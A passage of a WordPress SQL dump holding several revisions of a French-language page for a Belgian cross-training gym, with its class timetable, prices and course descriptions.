5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:39:35', '2013-07-03 17:39:35', '', 11, 'http://www.crosstrainingcenter.be/?p=191', 0, 'revision', '', 0),
(192, 1, '2013-07-03 17:39:50', '2013-07-03 17:39:50', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 50%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:39:50', '2013-07-03 17:39:50', '', 11, 'http://www.crosstrainingcenter.be/?p=192', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(193, 1, '2013-07-03 17:40:05', '2013-07-03 17:40:05', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 30%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:40:05', '2013-07-03 17:40:05', '', 11, 'http://www.crosstrainingcenter.be/?p=193', 0, 'revision', '', 0),
(194, 1, '2013-07-03 17:40:25', '2013-07-03 17:40:25', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 35%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:40:25', '2013-07-03 17:40:25', '', 11, 'http://www.crosstrainingcenter.be/?p=194', 0, 'revision', '', 0),
